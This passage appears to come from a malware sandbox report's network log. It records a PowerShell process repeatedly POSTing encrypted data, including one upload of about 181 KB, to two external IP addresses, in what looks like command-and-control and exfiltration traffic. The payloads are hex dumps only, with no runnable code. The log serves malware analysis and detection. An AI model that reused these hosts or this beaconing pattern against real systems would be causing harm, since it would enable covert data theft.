Aug 28, 2021 00:06:46.425549030 CEST	6412	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 281 Connection: keep-alive Data Raw: 4d 6b 8d 0f 24 d9 02 09 14 4a 17 f9 13 46 44 84 8a ba cc d8 3d 1d 83 2c e2 ba d3 5c 18 80 ae 86 26 7c 19 48 c3 43 de a5 db c3 72 16 5f 0e ff 63 c6 2b e0 e0 94 cb 93 0b f0 c2 b2 b9 dd cf f3 a2 1a d3 31 b2 de ca 7c 8a 93 d3 fa 1b 1e 43 29 11 22 b8 32 52 56 9c 02 17 1d 5a 0b 41 11 25 f7 c6 c3 9d dc 56 b3 1a 4d dd ff 3f 61 ff a3 4d 2e 2e 6b ea 9c ae 6d 51 6f 6e b8 63 52 24 51 ab 5e ae 31 ed a5 3a af 04 7a 92 fd 87 52 e6 8e 4b b4 5f 5a 0c c8 2e 80 64 f5 2f 7b d5 61 6a 17 6c 4a 16 56 ec 05 60 3f 3e 49 c8 0c c6 39 da d0 b1 4a 99 38 91 0e a8 e0 bc 59 11 c9 c7 fb 9f 10 64 76 11 55 05 9b 23 c4 f8 b3 57 00 ee 49 47 c5 85 12 6a 9a 58 c5 45 f3 1b 5a ea 85 ae fe 64 ff d6 ae cd 67 11 f7 98 18 d4 44 45 e8 d2 4f 3a 85 07 0a c2 40 f0 eb 8e 09 95 56 3d 72 d6 07 f7 48 dc f9 06 8c 3b 19 28 76 11 98 3e 2a 09 9b 45 cb ca ff 63 dc 7b 77 78 38 f3 1b bc ce Data Ascii: Mk$JFD=,\&\|HCr_c+1\|C)"2RVZA%VM?aM..kmQoncR$Q^1:zRK_Z.d/{ajlJV`?>I9J8YdvU#WIGjXEZdgDEO:@V=rH;(v>*Ec{wx8
Aug 28, 2021 00:06:46.539088964 CEST	6413	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 261
Aug 28, 2021 00:06:47.067325115 CEST	6417	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 157 Connection: keep-alive Data Raw: fa 9e a1 a3 df b0 f8 5b 72 ee d4 46 26 85 92 53 d7 5c 2d 7d 44 22 95 08 93 44 fb 68 21 53 ff 0d 8f 1b 99 7f 36 e9 dd 22 12 a3 e3 30 18 28 e6 6f d5 36 29 d9 d6 5c c6 4f db b3 77 b3 92 df c9 41 47 6b 3b 77 be af 16 51 06 55 5d ea 00 3a 76 d0 26 41 a5 d5 b4 dd cd 4a b7 e1 d2 4f aa f2 da 07 0b 0a c0 85 90 c4 87 3d 3a c3 9c 98 c7 a3 6f e1 1d c0 99 4b bb da 94 76 cf c2 37 a3 eb c3 34 4d f3 aa 47 d7 41 58 5c 80 21 6c 56 db 00 a6 0c 9d af 37 c8 56 c6 5a 49 e9 3f 5e ef 86 76 Data Ascii: [rF&S\-}D"Dh!S6"0(o6)\OwAGk;wQU]:v&AJO=:oKv74MGAX\!lV7VZI?^v
Aug 28, 2021 00:06:47.179299116 CEST	6417	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 706
Aug 28, 2021 00:06:47.694952965 CEST	6421	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 239 Connection: keep-alive Data Raw: e9 3b 90 19 77 82 d5 16 8f a1 50 d3 ea 4f a6 fd ec 82 1e fe 32 d5 ab 1d ea 94 1c 2c f3 26 25 ea eb 86 0f c1 6c 6f 36 3d bc 3c 0f 07 c5 2e 7b 13 fe 72 4a 5f b1 35 5d b6 cd a6 fc 7b c1 ad 01 9e 14 39 a1 e2 88 48 fb 08 49 14 0b c3 9b 38 38 ff 8e 28 78 49 04 f3 7a b6 e2 e1 9d b9 48 5b a4 1e fd 36 51 72 81 53 03 ad 62 29 da 63 02 80 7d 8e 66 ef 9c e9 ee 6d 49 62 e3 d1 c9 a1 82 d0 d1 b0 ef 25 a3 1b 16 c9 2d 18 2c ca 30 2a fe 06 e7 fc af 46 29 f6 0b 05 94 7b f3 04 f8 05 a8 60 00 9b 55 dc 9f 6c fc b8 e7 fb 67 7b b9 e9 d5 d1 42 18 00 eb 23 66 85 1b 3b ca 4e 3f 2f 50 63 f4 81 38 69 ea f5 fd 4d e2 11 65 83 3b fe 94 4e c8 b0 74 d4 d5 ed e0 a4 b0 5e c7 b8 55 e7 63 92 04 cf 9a 0f 2a 0e 30 00 9d f5 ef 82 c0 17 59 26 1a 97 Data Ascii: ;wPO2,&%lo6=<.{rJ_5]{9HI88(xIzH[6QrSb)c}fmIb%-,0F){`Ulg{B#f;N?/Pc8iMe;Nt^Uc0Y&
Aug 28, 2021 00:06:47.804497004 CEST	6421	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 375
Aug 28, 2021 00:06:48.328032017 CEST	6424	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 124 Connection: keep-alive Data Raw: 70 84 12 4a aa 68 f7 10 8f d9 a1 9d 48 e6 59 97 0f 35 7f 79 0b 86 8e ea 7d 72 6f 34 50 cc fd 37 06 07 29 24 af 82 6a f7 3a 58 e2 00 5b 26 36 3c 2b d2 f0 75 f6 47 79 cd 50 cb 7a cc e7 57 24 7d 5c 7a 94 be 53 83 21 ca 5b 9e a2 fe c8 4a 13 f7 63 e8 40 55 d1 db 8c 6d 31 27 48 93 f3 69 48 9f 30 2e f5 dc 89 e8 a5 ed 62 a6 10 00 c9 d7 5c a8 8f 6e 4d a1 41 c8 74 ab 65 39 3c da Data Ascii: pJhHY5y}ro4P7)$j:X[&6<+uGyPzW$}\zS![Jc@Um1'HiH0.b\nMAte9<
Aug 28, 2021 00:06:48.445050955 CEST	6424	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 461
Aug 28, 2021 00:06:48.974042892 CEST	6428	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 132 Connection: keep-alive Data Raw: f9 31 63 74 04 a9 07 74 9c aa 2a 5a 60 9b d6 4c ba 92 21 1d d0 f2 c9 66 49 02 f1 34 04 dd 79 c6 eb bb 97 5b 97 46 22 ef e8 ef dd 7a 03 94 34 9a a1 e8 9b 00 78 c9 88 ff dd 8b cd b0 0f 7a 98 3d d5 0e c3 9f a8 60 f8 3a a0 e3 52 1b 25 ce 43 53 16 b1 30 1c 1c 06 62 e0 46 c2 dd b8 f1 19 46 5d 2f 00 5d b5 e5 11 bd ca 9f 57 83 8b 4a 3d b4 10 c9 ab 5f ec 23 6c af 3b 5b 42 ca 68 bc c6 06 19 14 91 44 66 Data Ascii: 1ctt*Z`L!fI4y[F"z4xz=`:R%CS0bFF]/]WJ=_#l;[BhDf
Aug 28, 2021 00:06:49.086757898 CEST	6428	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 479
Aug 28, 2021 00:06:49.610600948 CEST	6431	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 110 Connection: keep-alive Data Raw: f1 48 cc 7c d1 e4 3e b4 d7 24 bd 52 3e c3 bd b0 da 51 be 56 3f 05 f1 77 f8 41 de e5 4f 00 33 e5 48 8a 08 a8 7d 66 dc ee 9c 39 19 39 46 46 69 0e 5c f0 e7 94 70 c4 87 f9 5e 3d 6f 35 6c af 41 12 e6 02 a4 0a 1b da 44 f3 68 c7 76 dc f0 b8 22 e0 cf eb 51 ae 3b 61 ca 1b 58 92 03 1a 08 c0 a1 e2 95 31 a4 dc 28 29 5b d8 d8 1a da 1c d6 6d Data Ascii: H\|>$R>QV?wAO3H}f99FFi\p^=o5lADhv"Q;aX1()[m
Aug 28, 2021 00:06:49.726401091 CEST	6431	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 392
Aug 28, 2021 00:06:50.244579077 CEST	6436	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 253 Connection: keep-alive Data Raw: ea ce 3a bc a2 ea 23 ea 40 bf f6 08 66 ff 78 af e2 32 87 19 6e 04 4e 84 e3 6f c7 bc 40 0a 90 d4 e9 06 0d aa 61 13 13 52 a1 52 7e 62 a0 aa ce 89 25 41 9d d2 0d 83 e8 7e e2 21 15 a9 e4 fc 76 81 ca 80 c3 b4 0a 04 c8 9f 0b 5b d8 74 3e 04 1a 4f e4 10 2b ad 5a 02 db d6 80 ce e7 a3 48 bc a1 d7 d1 e1 53 e0 fc 7d 2a 5a 83 60 75 7e b2 cf be a7 36 48 8a 56 54 19 c5 93 50 9e 3d 46 0c 03 20 0a 23 f9 0f 7a 8d 5e 5b de 69 5a 06 f4 4f 4d d3 ba 98 d2 07 59 32 3c fd 60 ef eb 1e a0 9b e6 37 8e ca 93 97 f8 56 27 e7 2f a9 3b 95 45 00 9c 23 f2 c2 71 9a b5 4e d9 7e 05 82 67 f1 58 e7 49 ea 47 33 7e 0f 7f 8c 59 07 63 db ae 6d 16 4b e0 68 5f 7b 00 8d 7f 3a 81 0c 65 cf 58 7f 82 89 8d f9 7b 4b c0 4f c8 6a ab f7 8c ff 01 a4 b3 3b 2d 50 49 d0 5b 3c 69 e1 05 6d 1c 0c 26 7e b6 a0 Data Ascii: :#@fx2nNo@aRR~b%A~!v[t>O+ZHS}*Z`u~6HVTP=F #z^[iZOMY2<`7V'/;E#qN~gXIG3~YcmKh_{:eX{KOj;-PI[<im&~
Aug 28, 2021 00:06:50.351386070 CEST	6437	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 619
Aug 28, 2021 00:06:50.862952948 CEST	6441	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 246 Connection: keep-alive Data Raw: f2 71 84 1e 0b 49 16 a3 1f 8a 67 45 f3 58 a6 37 43 6e 58 7f aa 4a 9f 6b 96 44 87 96 e7 27 a6 ca d4 cf 5f 99 59 9c 4a 9b 28 2a 7a 69 dd 38 8c bc 5a 88 91 32 30 fd dd 8a f9 e0 76 0b a1 45 f3 e2 e2 d2 c2 9c de a4 b5 cd 5a 71 72 64 ae d7 a0 7a e4 62 7e 93 4e 13 e5 36 78 fb d4 d0 76 8f 24 80 b6 39 bd ab 5d 59 38 1e 23 e2 fb 6d 08 ae 71 16 24 d3 a6 1a 8e 79 b6 57 5c 83 f8 17 66 9d f7 85 70 9f 45 91 e9 6c 7a 26 91 81 07 88 3f 2e 6f ba ad 39 ae aa ef 9a 47 14 ce 3c 06 c4 4a c7 cc 43 f0 cf 56 d6 d6 00 c5 62 c2 e1 96 85 24 ca cf f8 52 08 f7 9f f1 ff af 99 2f d7 ea a7 ab 95 f4 4c fc a5 46 fc 5e ec 5d 2a 18 94 f2 91 1e 73 8f b3 ba e6 b7 34 10 67 e1 1b e3 70 b8 71 c5 86 9b 74 d6 0d 38 23 63 e4 9f 15 e9 f8 ab 32 03 6d 77 55 9d f2 3c cb 83 ce Data Ascii: qIgEX7CnXJkD'_YJ(zi8Z20vEZqrdzb~N6xv$9]Y8#mq$yW\fpElz&?.o9G<JCVb$R/LF^]s4gpqt8#c2mwU<
Aug 28, 2021 00:06:50.976437092 CEST	6442	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 281
Aug 28, 2021 00:06:51.495634079 CEST	6444	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 98 Connection: keep-alive Data Raw: 76 94 2d 72 c7 5d 02 80 d0 1e 62 20 29 c5 ca 66 79 00 62 aa 81 6e 6e 9d 8d 20 32 b7 cb ba 25 bc bf 06 91 b5 7b 98 8c f4 37 bc a9 9f b6 aa 1c 4b d0 1a 75 cc 50 01 74 ad c8 95 55 79 c7 1e 78 1c 35 eb 08 3f 19 53 4b 89 7a 0c 5e 7c f2 ac fb a9 b4 a8 db ac 19 c2 f4 25 a0 6b d5 ad 5f 40 40 ba 91 40 Data Ascii: v-r]b )fybnn 2%{7KuPtUyx5?SKz^\|%k_@@@
Aug 28, 2021 00:06:51.602119923 CEST	6445	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 710
Aug 28, 2021 00:06:52.122215033 CEST	6448	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 203 Connection: keep-alive Data Raw: a3 21 6f 54 33 8d 94 d0 97 17 82 59 d4 4c 45 3f 54 90 c8 a8 ab da 4b 2d 71 4b 4d d4 17 51 e2 91 33 d2 5a 48 01 0b 9b 78 96 14 ea 2e 86 41 c3 45 f5 91 3d 10 18 6d 0e 1f e1 89 a4 ce e3 92 55 f8 6e 92 7b 20 b2 23 e3 62 a7 7b 23 6e 7b d2 dc c0 92 55 38 44 37 1e bf 0c ca 66 fe 77 ca ba af 43 be cd a8 93 98 2c 06 15 6d 01 bd ea 39 79 bf 9b 19 6e 37 2f 58 38 60 03 5a 82 00 2d c8 98 1e 3c 54 e7 64 01 e6 8b bc 30 87 0b e0 e6 e1 db b0 bf 76 01 54 cb ae d5 c2 02 5b d9 66 2e 86 ec 97 a0 cb 28 8c e9 e0 60 cf bf 41 d0 c2 ff ca 58 41 3c 04 b6 e9 86 ed 10 9f 5e 9b 4a b3 5a a5 24 6a a1 53 fb 68 49 4f df 62 3b 7e d7 84 Data Ascii: !oT3YLE?TK-qKMQ3ZHx.AE=mUn{ #b{#n{U8D7fwC,m9yn7/X8`Z-<Td0vT[f.(`AXA<^JZ$jShIOb;~
Aug 28, 2021 00:06:52.226829052 CEST	6448	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 302
Aug 28, 2021 00:06:52.744960070 CEST	6451	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 324 Connection: keep-alive Data Raw: d9 c1 3c de a1 1b a6 76 d2 cb ae 4c 2b db 76 0d 85 b7 2d 1c 1b ec df e2 77 da d8 09 48 bc 6f 73 be cd 66 e8 da e0 5d d9 ce 6c f6 89 cd 26 79 5e ae 07 9f cb a3 c5 05 ba c7 4b d4 cd ae 86 14 f0 77 99 ba 0d 89 d3 e9 32 2a be 3b 2f 62 a0 82 ac 0f b7 fe c2 73 c8 06 e7 cc 59 dc 68 54 c3 1f 18 8f 8d 42 e7 36 9c 36 c3 4c d5 ed 18 2b 0a b0 2c d5 7e 8c b5 e9 f4 18 f8 49 45 97 b4 9e e5 f8 d3 0b 8b 76 89 a3 c7 06 f7 5f 88 bd 16 08 7f 79 70 e5 a0 98 09 06 e7 48 53 4c ed ee 2b 7b 4a 47 ac fe 7d 24 40 9b 64 5c 56 7e e8 55 86 b3 2e 92 9f 27 88 cd 7b d7 20 e9 1c 56 be 2e d2 53 41 be 07 af 45 a7 74 37 44 a8 36 90 bb 4e 29 c0 d5 d3 a0 6b 92 cb c3 a3 f4 19 73 a1 59 47 12 7a be f1 18 2c d1 1d 60 c3 ef b4 ac 44 f3 e4 b2 31 59 37 0f e3 23 0c 00 da 2f 8a e8 c9 45 89 8d 25 8c 91 b1 5a c2 b8 9b 95 ca 4f ed 4d 95 4c 56 af a0 03 18 0e 8c 18 51 a6 64 6e fd ff 1c e1 35 e9 42 5e 8b 0c 32 53 09 06 46 7b e7 54 0c eb 03 e6 95 d1 82 a9 e6 07 85 d9 56 37 24 39 d3 d5 54 13 f5 98 30 36 4e b7 c7 Data Ascii: <vL+v-wHosf]l&y^Kw2*;/bsYhTB66L+,~IEv_ypHSL+{JG}$@d\V~U.'{ V.SAEt7D6N)ksYGz,`D1Y7#/E%ZOMLVQdn5B^2SF{TV7$9T06N
Aug 28, 2021 00:06:52.851728916 CEST	6452	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 558
Aug 28, 2021 00:06:53.356944084 CEST	6454	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 151 Connection: keep-alive Data Raw: ff 10 a5 3f 51 61 0b d7 43 c9 5f 85 18 05 33 56 de 5f 74 8f cb b8 a1 10 78 99 02 7c 5b 48 ae a1 6a 7f 22 fd a1 0c 74 bc 10 b7 4b df 5c 13 6d 49 24 a0 1c d6 f4 62 1a 0f 36 aa a4 83 bf 9a 94 63 28 8d bc 15 4d 43 00 0a 52 f0 22 2c c6 96 4e be b9 d6 b9 20 73 ac 6a fe 30 7a 6c 54 ff 7a 97 71 7f 9b a9 e6 4c 16 44 92 83 b0 6b 7f df 6f 7c cc fa 80 08 04 78 11 f0 11 c4 ad 58 95 9d 8b 98 72 5f 24 16 fc 8a 01 6b 9f 71 13 63 52 00 26 47 98 84 47 36 42 b3 c2 94 Data Ascii: ?QaC_3V_tx\|[Hj"tK\mI$b6c(MCR",N sj0zlTzqLDko\|xXr_$kqcR&GG6B
Aug 28, 2021 00:06:53.461172104 CEST	6456	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 451
Aug 28, 2021 00:06:53.980892897 CEST	6458	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 280 Connection: keep-alive Data Raw: 91 22 02 7c 80 a2 35 3a 10 22 09 de f0 df dd 5f 47 62 3d 2b 90 9e 22 59 48 83 82 1d 11 3c 2b 99 5c de 6e 20 15 82 3f b7 ac 16 b7 2d 87 c3 e8 af 0e c3 01 6b 7c b5 f9 11 75 0e 47 de 27 14 9d 6a d3 5b 09 47 63 84 a7 b3 cf 1e bd 26 cf 6b 8d 84 21 c9 e7 8e 1b 03 f6 66 e0 d8 03 81 7e 41 de 0d b0 d6 19 f1 e0 3a 67 33 f0 4c 34 c2 38 5b fc c2 0a 62 26 19 3d 56 35 12 cb 40 de d5 b9 bc da 40 91 52 f6 8a f5 7a 7e f5 a2 fe af 57 ae 3d 89 9d bc 73 1b 3c 68 6a ea 31 40 87 35 fb 98 c8 05 9c e4 80 b5 20 a0 2c 2d f5 3e 83 d3 d4 dd 76 56 60 2a 20 f5 1c c9 6f 9b 3f bd ca 5f 7e b1 e8 54 04 7e 6b c2 b9 b4 8c 2e 00 85 c2 4c 53 ab 6c 44 4e c3 5c 1c 52 05 4b e8 a2 73 ad e4 63 70 7e 6c 7e ec 22 b6 2e 19 24 fc 32 ad 5f 27 ab 42 21 ef 13 30 18 81 ec 0e 4a e2 83 90 73 ef 06 df 79 c5 17 33 01 8c fb f5 fc 30 39 46 51 0a ed 6e 4e 8c 4b 43 f7 9e 76 8c 58 82 dd Data Ascii: "\|5:"_Gb=+"YH<+\n ?-k\|uG'j[Gc&k!f~A:g3L48[b&=V5@@Rz~W=s<hj1@5 ,->vV`* o?_~T~k.LSlDN\RKscp~l~".$2_'B!0Jsy309FQnNKCvX
Aug 28, 2021 00:06:54.086416960 CEST	6459	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 270
Aug 28, 2021 00:06:54.606189966 CEST	6461	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 149 Connection: keep-alive Data Raw: 6b 72 bf 6a ad 0f 7e 2e bc 7a ff f7 2c f0 d4 9c 4d 55 7b 8e 55 5a 1b 9f f4 2e af 76 4c 72 93 cb e0 06 27 9f 4c b4 31 e3 cd 76 44 ee ee 2c 5f de 1d d1 5b 76 bc 56 f8 36 7d 2d 96 7a 28 19 92 0c bb e5 38 ae 00 18 ae d4 f2 c1 01 ff 5a 4d 1b 63 59 f9 b3 3e 74 3a 25 59 a3 d9 cd cf d8 fa fe 10 d5 14 5e 42 1e ea e0 e9 70 10 ff 02 02 4d 27 0b c4 76 7c 2e 25 bd 46 58 dc 99 43 f4 34 9d 2f 3c d1 88 e3 9e 5a 7c 14 19 64 e0 4b 92 89 20 52 46 43 52 f3 f4 be Data Ascii: krj~.z,MU{UZ.vLr'L1vD,_[vV6}-z(8ZMcY>t:%Y^BpM'v\|.%FXC4/<Z\|dK RFCR
Aug 28, 2021 00:06:54.711429119 CEST	6461	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 617
Aug 28, 2021 00:06:55.232255936 CEST	6464	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 257 Connection: keep-alive Data Raw: d8 ba 43 92 46 17 3e cf 0b 57 98 a3 0a 14 37 ce 12 f1 31 13 3d 3b 12 b2 5d 01 4b 0f 36 5f fa 3a 4c f4 96 6a 90 3a 25 14 e4 67 a0 dd ee 06 d0 3d e4 bd 37 0d c6 a2 0b d1 60 7b 0f b5 d1 dd 01 8c cf ab cd 90 ba bc 24 82 18 3e 19 57 80 17 9f 2d b7 15 fd 26 68 57 72 93 d9 41 50 6f 1c 30 da 28 71 27 68 f9 c5 96 28 e6 8f 43 be 36 08 78 cb 5c 4d 8b 92 dd 03 7e 35 77 fd 93 ef 0d f1 f1 29 43 fa 2c 8d 14 7d 42 67 59 5f 7a 3b 1d ee 43 5a 58 c2 fb ef ff 35 b7 09 ac e4 41 c4 1c b6 49 f9 b5 7a 01 d0 b9 4d 9c d0 95 b5 b1 1e 43 96 e0 5b a9 00 04 17 ac 3f 2d 81 fc ce 34 a5 ea 43 ab 5c 0c 9e 41 c1 5a ff fd ee 1a 36 80 19 28 cc 44 2e 21 bc 2e 63 4c ad 07 ec 33 b4 1d 7d 65 2e 6b f9 58 1b ca 48 6c 95 8b d4 19 8f ad 95 1e 17 1c 9b a1 ab 4c 8c b8 c2 0e c8 0b 13 a4 5d e8 53 7a 3d 19 e8 Data Ascii: CF>W71=;]K6_:Lj:%g=7`{$>W-&hWrAPo0(q'h(C6x\M~5w)C,}BgY_z;CZX5AIzMC[?-4C\AZ6(D.!.cL3}e.kXHlL]Sz=
Aug 28, 2021 00:06:55.335870981 CEST	6465	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 585
Aug 28, 2021 00:06:55.842588902 CEST	6467	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 226 Connection: keep-alive Data Raw: 7e 85 2e 51 bd bd b4 07 b5 32 22 e6 7a 0d ee 11 ac 94 c8 c3 0b 92 b7 e1 e3 80 c4 4a 6e 46 4f 6c a5 ee c9 94 0b b8 e2 34 bd c5 9d cb 24 e6 bc 6e bc 79 c5 64 99 89 fa 17 82 62 87 af 3f 6c 55 ae da d0 90 8c ba 8a 3b e2 09 08 eb dd 60 82 5c 11 6e 32 a5 34 ff f8 d1 f4 f4 51 7e af 3e d5 fa f6 57 d4 81 65 bd ea 01 38 17 02 c7 7d a1 e1 89 df c5 18 6b e4 89 3f 1a f3 e2 08 fe 49 a0 8c 1a 30 b4 f6 f5 3f 1f 29 3e 6d e2 56 47 69 45 e8 da 0a 66 00 90 12 98 28 08 7e b1 e4 4f dd af 49 c5 23 81 51 84 4c 8b f4 d0 00 bd d0 b2 15 40 9e 44 c2 ff 06 c2 0a a0 bd 33 37 68 6b c3 86 c3 c8 6e eb 1b b3 a2 87 b1 78 06 91 e2 fe e9 a8 d8 ef 93 fc 8c 4b 47 06 ae 78 3f 3e cb d9 68 e7 2a 34 fc a3 71 ed Data Ascii: ~.Q2"zJnFOl4$nydb?lU;`\n24Q~>We8}k?I0?)>mVGiEf(~OI#QL@D37hknxKGx?>h*4q

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49739	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:01.033390045 CEST	6637	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 623 Connection: Keep-Alive
Aug 28, 2021 00:07:01.099296093 CEST	6642	OUT	Data Raw: 91 bd 66 b5 0f cb 41 a4 11 c6 2e a2 41 e0 63 c9 c4 7f ee 36 3b 97 26 f1 93 3f 09 2f e0 30 28 d4 fd 1f 33 d1 a6 48 27 6e 59 99 f9 73 a8 04 47 b9 12 c0 bc 75 a7 c3 7c f8 97 73 23 cf c2 13 c2 e0 9e 59 a4 22 ad 91 23 7d 58 81 db a0 9c b2 4a 8f f6 4f Data Ascii: fA.Ac6;&?/0(3H'nYsGu\|s#Y"#}XJO!s-:9:3%WGO_%@&]tn,jtWX0C3RU~7R6$PR/c1X;V%C;.sKzO.xp(!~X)JmJ\|ff
Aug 28, 2021 00:07:01.370343924 CEST	6682	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 81 Connection: keep-alive Data Raw: 7a 48 31 a0 7a 22 9e 18 9e 64 95 73 56 b6 f8 28 52 71 60 e9 5f 03 bb 1e cd 99 11 7d 31 8c e1 32 07 a8 44 d5 d8 67 d3 70 13 98 fc 1a d4 26 f4 a2 00 20 46 7a 72 68 5d 6a 2a 81 79 73 d7 32 28 f1 86 eb ab 3e ea 44 0d b1 b9 48 2f 18 0e d2 93 96 07 Data Ascii: zH1z"dsV(Rq`_}12Dgp& Fzrh]j*ys2(>DH/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49741	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:01.641063929 CEST	6698	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 181018
Aug 28, 2021 00:07:01.641197920 CEST	6710	OUT	Data Raw: 42 6c 63 aa 43 a9 c6 fb a2 72 a2 4b 18 29 b8 c8 59 fa be 21 a3 84 e5 a1 46 d6 60 65 58 05 92 b9 43 c4 97 49 ae 92 f0 f4 8b 0a e4 89 f6 36 d0 39 8f 81 37 0e b8 b4 3c bd 86 c0 64 6b 49 62 a3 9e df e8 09 52 91 6f 1a c5 0a c8 95 99 9e 5d aa 11 06 28 Data Ascii: BlcCrK)Y!F`eXCI697<dkIbRo](.)fG. gp Te"[y,l4Wo]o!uM&r<nu{q]tTbfu/C4>x$\hB<rN_>CNhW!^
Aug 28, 2021 00:07:01.714682102 CEST	6735	OUT	Data Raw: 6a f8 16 29 21 0c 31 3e 56 9d 2a 71 b7 68 31 6a 8b 7c c4 01 13 ad 41 ed 9e 53 2e f4 ae 2c 21 ab a2 50 44 fc c1 26 1d cb c1 10 fe 04 c2 fc d5 2e a8 cb e6 6a 46 42 99 25 d9 b3 d7 dd cb 9e 25 43 e3 92 ed 73 19 0f f8 68 6f b0 ad ed b3 30 32 98 43 8c Data Ascii: j)!1>Vqh1j\|AS.,!PD&.jFB%%Csho02C[k+Mb]}%{>J@7dCi(nuq~5@Z+TH]"@WBVL0,BM YsM
Aug 28, 2021 00:07:01.930715084 CEST	6770	OUT	Data Raw: ac e8 d6 ce 79 3b 6f e5 ba 4f ac 2c 8a 60 71 bd dd 21 a4 e3 a5 f9 d7 c7 e2 78 e1 4a 07 ba 2a 1e bd 58 77 ad 14 80 58 68 2c 13 2c 12 0e aa 3d bd cd 49 d9 ff aa 11 50 91 23 ce 9d af c2 8e 4e 42 e5 5e a2 c7 b6 5d 6e ff cf 5d 82 d1 b1 7a 48 05 6b a6 Data Ascii: y;oO,`q!xJ*XwXh,,=IP#NB^]n]zHkU=5Qd^#VZvHJP7k~dYNK%Z^:i7u?>z`)7uS5W+,\|\|6I]ef.M{QX `
Aug 28, 2021 00:07:02.009668112 CEST	6782	OUT	Data Raw: e8 e9 3f eb 33 e1 96 6b 32 14 48 09 b3 1a 9f 06 dd 45 e1 44 db d6 6a 1f 61 49 f4 4e f8 36 c8 6f 28 61 ad a2 e5 fa a6 0e b7 8a 3c cb 4c b9 60 d5 22 80 82 8c 33 ad e8 74 a3 b9 f1 aa 95 01 3b 9c cc 72 ce 15 2f 08 92 2b 6c 80 2a b3 8c 6a 66 a3 ff 8c Data Ascii: ?3k2HEDjaIN6o(a<L`"3t;r/+ljf\|a]q]-}3.8mBPWl?D45"A=br'aL6x,fytaniGNtx*A~;&`qSWU:7X=0
Aug 28, 2021 00:07:02.009778023 CEST	6821	OUT	Data Raw: e9 82 9a 2a 35 18 14 cb fc 97 9c da 46 24 dd 8c ba 3a 46 32 4c 58 2e c9 1c b9 cc 43 ab 1f 07 1e bc f0 09 73 9a 56 80 0b 91 0c 9d e6 0a 39 31 96 3e ab bd 0d af 0c bf c0 29 04 6b c9 17 af 33 d1 14 0f e7 76 e1 07 18 0f f7 b9 11 07 b0 0d 0e c4 e2 fa Data Ascii: 5F$:F2LX.CsV91>)k3vz2+r6hm0[A(`/HY^'yad4@%9d*aE1$Bn" ,WJirS2PCEU:Mf[K^XV^^/VZU"-:g
Aug 28, 2021 00:07:02.077208042 CEST	6826	OUT	Data Raw: a5 da 6f 7e c1 8d 1c 18 cb fb f6 e2 59 74 35 17 40 91 be 52 bc d0 27 fc b7 e7 4c dc 5d e5 76 55 52 63 29 d1 b6 37 4c 0d 5f 9b ea b7 e1 37 23 c8 1f 14 0a ba 01 cd 2b aa 30 2c 66 d9 c9 e4 63 00 9d fe fb 2e 2b 87 91 4a 39 4a dc 74 ba 4d 1e 5d e3 02 Data Ascii: o~Yt5@R'L]vURc)7L_7#+0,fc.+J9JtM]bSi\Za/GW`>wmJ}E[yxgH3_Y8X, s6\|^(@ZvN4k&/x2E0(s+JRd#v86H=?#XCwjbNv!)%
Aug 28, 2021 00:07:02.077287912 CEST	6842	OUT	Data Raw: 49 46 99 a0 a5 e6 a4 7a 4a 2e e7 5b c8 36 ee ac 5c ae a5 6f 0b 9e 93 28 93 65 0b 78 9a 5d e0 fe 4b 61 cf fa cf 71 82 d1 aa 37 b6 77 d4 5d b9 2c cf 9d 08 10 f3 14 c1 dd 03 ce 3b 63 96 32 75 09 cc 41 36 ab f2 75 01 a0 c4 d6 77 99 83 e6 d3 57 da dd Data Ascii: IFzJ.[6\o(ex]Kaq7w],;c2uA6uwW[LDs#K=R41Y095o$E\|J[w7aK_V% j-m2*.7Y L&@29sIl(LdB2pt
